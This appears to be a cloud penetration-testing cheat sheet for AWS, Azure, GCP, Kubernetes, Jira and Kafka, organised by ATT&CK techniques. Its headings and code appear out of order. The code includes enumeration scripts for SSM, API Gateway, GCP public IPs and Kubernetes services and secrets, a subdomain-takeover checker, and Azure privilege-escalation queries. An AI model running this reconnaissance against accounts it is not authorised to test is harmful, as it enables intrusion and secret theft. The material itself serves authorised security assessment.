Shodan.io query to enumerate AWS Instance Metadata Service Access
Google Dorking for AWS Access Keys
Recursively searching for AWS Access Keys on *Nix containers
S3 Log Google Dorking
Public Redshift Cluster Enumeration
Python code to check if AWS key has permissions to read s3 buckets:
Find S3 Buckets Using Subfinder and HTTPX Tool
Cognito (T1087.004)
[!NOTE] Before proceeding, capture the session's JWT during login and save to a file (ex: access_token.txt) This can be accomplished using your browser developer tools or another method
Get user information:
Test admin authentication:
List user groups:
Attempt sign up
Modify attributes
AWS Trivy Scanning (T1595.002)
Install the Trivy AWS plugin: trivy plugin install github.com/aquasecurity/trivy-aws
Scan a full AWS account (all supported services):
Scan a specific service:
Show results for a specific AWS resource:
SSM (T1021.007)
Script to quickly enumerate and select AWS SSM-managed EC2 instances via fzf, then start an SSM session without needing SSH or public access.
Parameter Store:
Lists the parameters in the AWS account or the parameters shared with the authenticated user (secrets can be stored here):
API Gateway (T1190)
AWS API Gateway is a service offered by Amazon Web Services (AWS) designed for developers to create, publish, and oversee APIs on a large scale. It functions as an entry point to an application, permitting developers to establish a framework of rules and procedures. This framework governs the access external users have to certain data or functionalities within the application.
Enumeration:
GCP (T1087.004)
Enumerate IP addresses:
SSRF URL:
Cloud Subdomain Takeover (T1584.001)
Kubernetes Secrets Harvesting (T1552.007)
Kubernetes Service Enumeration (T1046)
You can find everything exposed to the public with:
Kubernetes Ninja Commands (T1609)
Password Hunting Regex (T1552)
Go Environment Variable Enumeration (T1082)
A sample script that enumerates environment variables. This script pairs well with the regex list provided above:
Jira (T1087)
Privileges
In Jira, privileges can be checked by any user, authenticated or not, through the endpoints /rest/api/2/mypermissions or /rest/api/3/mypermissions. These endpoints reveal the user's current privileges.
Pentesting Kafka (T1046)
Use Nmap to detect Kafka brokers and check for open ports:
# Login
$ az login -u <user> -p <password>
# Set Account Subscription
$ az account set --subscription "Pay-As-You-Go"
# Enumeration for Priv Esc
$ az ad user list -o table
$ az role assignment list -o table
#!/bin/zsh
function main() {
if ! command -v fzf >/dev/null || ! command -v aws >/dev/null; then
echo "This function requires 'aws' CLI and 'fzf' to be installed." >&2
return 1
fi
echo -e "Fetching SSM instances..."
local instances
instances=$(aws ssm describe-instance-information \
--query "InstanceInformationList[*].[InstanceId,ComputerName]" \
--output text)
if [[ -z "$instances" ]]; then
echo "No SSM-managed instances found." >&2
return 1
fi
# Extract Instance IDs
local ids=()
while read -r id _; do
ids+=("$id")
done <<< "$instances"
# Get Name tags for all instance IDs
local name_data
name_data=$(aws ec2 describe-instances \
--instance-ids "${ids[@]}" \
--query "Reservations[].Instances[].{InstanceId:InstanceId, Name:(Tags[?Key=='Name']|[0].Value)}" \
--output text)
declare -A name_map
while read -r id name; do
name_map["$id"]="${name:-N/A}"
done <<< "$name_data"
# Combine data with aligned formatting
local enriched
enriched=$(while read -r line; do
id=$(awk '{print $1}' <<< "$line")
hostname=$(awk '{print $2}' <<< "$line")
platform=$(awk '{print $3}' <<< "$line")
name="${name_map[$id]:-N/A}"
printf "%-30s %-20s %-30s\n" "$name" "$id" "$hostname"
done <<< "$instances")
# Dynamically size the FZF selection window based on amount of instances
local line_count
line_count=$(echo "$enriched" | wc -l)
local height
if (( line_count < 10 )); then
height=30
elif (( line_count < 20 )); then
height=50
else
height=80
fi
local selected instance_id
selected=$(echo "$enriched" | fzf --header="Select an instance to connect via SSM" --height="${height}%" --reverse)
instance_id=$(awk '{print $2}' <<< "$selected")
if [[ -n "$instance_id" ]]; then
echo "Starting SSM session to $instance_id..." >&2
aws ssm start-session --target "$instance_id"
else
echo "No instance selected." >&2
return 1
fi
}
main
aws ssm describe-parameters
# Generic info
aws apigatewayv2 get-domain-names
aws apigatewayv2 get-domain-name --domain-name <name>
aws apigatewayv2 get-vpc-links
# Enumerate APIs
aws apigatewayv2 get-apis # This will also show the resource policy (if any)
aws apigatewayv2 get-api --api-id <id>
## Get all the info from an api at once
aws apigatewayv2 export-api --api-id <id> --output-type YAML --specification OAS30 /tmp/api.yaml
## Get stages
aws apigatewayv2 get-stages --api-id <id>
## Get routes
aws apigatewayv2 get-routes --api-id <id>
aws apigatewayv2 get-route --api-id <id> --route-id <route-id>
## Get deployments
aws apigatewayv2 get-deployments --api-id <id>
aws apigatewayv2 get-deployment --api-id <id> --deployment-id <dep-id>
## Get integrations
aws apigatewayv2 get-integrations --api-id <id>
## Get authorizers
aws apigatewayv2 get-authorizers --api-id <id>
aws apigatewayv2 get-authorizer --api-id <id> --authorizer-id <uth-id>
## Get domain mappings
aws apigatewayv2 get-api-mappings --api-id <id> --domain-name <dom-name>
aws apigatewayv2 get-api-mapping --api-id <id> --api-mapping-id <map-id> --domain-name <dom-name>
## Get models
aws apigatewayv2 get-models --api-id <id>
## Call API
https://<api-id>.execute-api.<region>.amazonaws.com/<stage>/<resource>
#!/bin/bash
# Function to list all projects in the organization
list_all_projects() {
gcloud projects list --format="value(projectId)"
}
# Function to check if a specific API is enabled for a project
is_api_enabled() {
local project=$1
local api=$2
gcloud services list --project="$project" --filter="name:$api" --format="value(name)"
}
# Function to list all instances in a given project
list_instances() {
local project=$1
gcloud compute instances list --project="$project" --format="json"
}
# Main function
main() {
# Create or clear the files to store public IPs
output_file="public_ips.txt"
ip_only_file="ip_addresses.txt"
: > "$output_file"
: > "$ip_only_file"
# Get the list of all projects
projects=$(list_all_projects)
for project in $projects; do
echo "Processing Project: $project"
# Check if Resource Manager API is enabled for the project
if [[ -z "$(is_api_enabled "$project" "cloudresourcemanager.googleapis.com")" ]]; then
echo "Resource Manager API is not enabled for project $project. Skipping..."
continue
fi
# Check if Compute Engine API is enabled for the project
if [[ -z "$(is_api_enabled "$project" "compute.googleapis.com")" ]]; then
echo "Compute Engine API is not enabled for project $project. Skipping..."
continue
fi
# Get the list of all instances in the current project
instances=$(list_instances "$project")
# Check if there are any instances
if [[ "$instances" != "[]" ]]; then
# Loop through each instance and extract public IPs
for instance in $(echo "$instances" | jq -r '.[] | @base64'); do
_jq() {
echo "$instance" | base64 --decode | jq -r "$1"
}
instance_name=$(_jq '.name')
zone=$(_jq '.zone' | awk -F/ '{print $NF}')
public_ips=$(_jq '.networkInterfaces[].accessConfigs[]?.natIP')
# Check if there is a public IP and write to the output files
if [[ -n "$public_ips" ]]; then
for ip in $public_ips; do
echo "$project,$zone,$instance_name,$ip" >> "$output_file"
echo "$ip" >> "$ip_only_file"
done
fi
done
fi
done
echo "Public IPs have been written to $output_file"
echo "IP addresses have been written to $ip_only_file"
}
# Execute main function
main
import requests
from bs4 import BeautifulSoup
import dns.resolver
import argparse
from tqdm import tqdm
parser = argparse.ArgumentParser(
description='Query crt.sh and perform a DNS lookup.')
parser.add_argument('domain', help='The domain to query.')
args = parser.parse_args()
response = requests.get(f"https://crt.sh/?q={args.domain}")
soup = BeautifulSoup(response.text, 'html.parser')
domain_names = [td.text for td in soup.find_all('td') if not td.attrs]
for domain in tqdm(domain_names, desc="Checking for subdomain takeovers"):
# Skip invalid and wildcard domains
if '*' in domain or len(domain) > 253 or any(len(label) > 63 for label in domain.split('.')):
continue
# Identify cloud services and check for potential subdomain takeovers
try:
answers = dns.resolver.resolve(domain, 'CNAME')
for rdata in answers:
cname = str(rdata.target)
if '.amazonaws.com' in cname:
response = requests.get(f"http://{domain}")
if response.status_code in [403, 404]:
print(
f"Potential Amazon S3 bucket for subdomain takeover: {domain}")
elif '.googleapis.com' in cname:
response = requests.get(f"http://{domain}")
if response.status_code in [403, 404]:
print(
f"Potential Google Cloud Storage bucket for subdomain takeover: {domain}")
elif '.blob.core.windows.net' in cname:
response = requests.get(f"http://{domain}")
if response.status_code == 404:
print(
f"Potential Azure blob storage for subdomain takeover: {domain}")
except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN, dns.resolver.YXDOMAIN, dns.resolver.NoNameservers):
continue
kubectl get namespace -o custom-columns='NAME:.metadata.name' | grep -v NAME | while IFS='' read -r ns; do
echo "Namespace: $ns"
kubectl get service -n "$ns"
kubectl get ingress -n "$ns"
echo "=============================================="
echo ""
echo ""
done | grep -v "ClusterIP"
# List all pods in the current namespace.
kubectl get pods
# Get detailed information about a pod.
kubectl describe pod <pod-name>
# Create a new pod.
kubectl create pod <pod-name>
# List all nodes in the cluster.
kubectl get nodes
# Get detailed information about a node.
kubectl describe node <node-name>
# Create a new node
kubectl create node <node-name>
# List all services in the cluster.
kubectl get services
# Get detailed information about a service.
kubectl describe service <service-name>
# Create a new service.
kubectl create service <service-name>
# List all secrets in the cluster.
kubectl get secrets
# Get detailed information about a secret.
kubectl describe secret <secret-name>
# Create a new secret.
kubectl create secret <secret-name>